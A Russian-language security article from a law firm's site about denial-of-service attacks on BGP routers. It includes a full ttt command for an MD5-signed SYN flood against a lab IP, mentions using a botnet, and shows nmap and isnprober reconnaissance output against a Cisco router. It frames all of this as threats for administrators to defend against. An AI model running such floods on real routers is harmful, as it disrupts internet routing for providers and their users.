Москва
+7-929-527-81-33
Вологда
+7-921-234-45-78
Вопрос юристу онлайн Юридическая компания ЛЕГАС Вконтакте

«Слепые» DoS-атаки на BGP-маршрутизаторы.

Обновлено 29.09.2025 12:11

Слепыми мы будем называть те атаки, которые не требуют каких-либо дополнительных знаний, кроме IP-адреса BGP-маршрутизатора. Простейшим сценарием такой DoS-атаки является SYN flood на порт TCP 179. Для реализации подобной атаки на промышленный маршрутизатор необходимо использовать несколько десятков компьютеров, а лучше бот-сеть.

Более интересным способом «затопления» целевого роутера BGP, использующего MD5-аутентификацию, является применение SYN TCP-пакетов с MD5-сигнатурами. Эта атака позволяет добавить вычислительную нагрузку на обработку MD5 атакуемым роутером.

Такую атаку несложно осуществить с помощью утилиты ttt с опцией md5. Для оптимизации затопления несколько экземпляров ttt должны быть запущены на нескольких десятках машин.

Вот пример использования утилиты ttt:

arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5

allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y

179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191

Говоря об оборудовании производства Cisco Systems, следует упомянуть о возможности реализации атак на переполнение TCP/IP-стека IOS. Для того чтобы выявить такие уязвимости, можно воспользоваться сканерами уязвимостей, например Nmap, hping2 и isnprober.

Вот пример для маршрутизатора Cisco 2600:

kali# nmap -sS -O -vvvv 192.168.66.215

<skip>

TCP Sequence Prediction: class="truly" random

Difficulty=9999999 (Good luck!)

TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C

<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215

-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --

Using eth0:192.168.77.5

Probing host: 192.168.66.215 on TCP port 23.

Host:port ISN Delta

192.168.66.202:23 -1154503313

192.168.66.202:23 -24125463 1130377850

192.168.66.202:23 2031059534 2055184997

192.168.66.202:23 965205234 -1065854300

192.168.66.202:23 -1974685094 -2939890328

192.168.66.202:23 1760147902 3734832996

192.168.66.202:23 2089287258 329139356

192.168.66.202:23 -923724721 -3013011979

192.168.66.202:23 -934490140 -10765419

192.168.66.202:23 -1262713275 -328223135

В целом протокол маршрутизации BGP версии 4 является неотъемлемой частью современного интернета, и, соответственно, проблемы в работе данного протокола непременно скажутся на функционировании глобальной сети. Поэтому если в обязанности системного администратора входит обслуживание маршрутизаторов, работающих с BGP (как правило, это компании-провайдеры), то необходимо со всей серьезностью отнестись к возможным угрозам и заблаговременно принять меры по защите от них.

Петухов Олег, юрист в области международного права и защиты персональных данных, специалист в области информационной безопасности, защиты информации и персональных данных.

Телеграм-канал: https://t.me/zashchitainformacii

Группа в Телеграм: https://t.me/zashchitainformacii1

Сайт: https://legascom.ru

Электронная почта: online@legascom.ru

#защитаинформации #информационнаябезопасность